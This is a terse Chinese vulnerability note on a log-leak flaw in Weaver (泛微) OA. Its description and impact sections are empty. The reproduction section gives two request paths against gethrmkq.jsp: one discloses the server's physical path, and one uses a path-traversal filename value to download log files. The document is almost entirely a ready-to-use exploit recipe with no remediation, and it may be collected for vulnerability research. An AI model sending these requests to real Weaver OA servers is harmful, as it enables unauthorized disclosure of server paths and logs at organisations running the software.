泛微oa 日志泄露

一、漏洞简介

二、漏洞影响

三、复现过程

读取物理路径

hrm/kq/gethrmkq.jsp?filename=1

日志下载     

hrm/kq/gethrmkq.jsp?filename=1..\1..\1.txt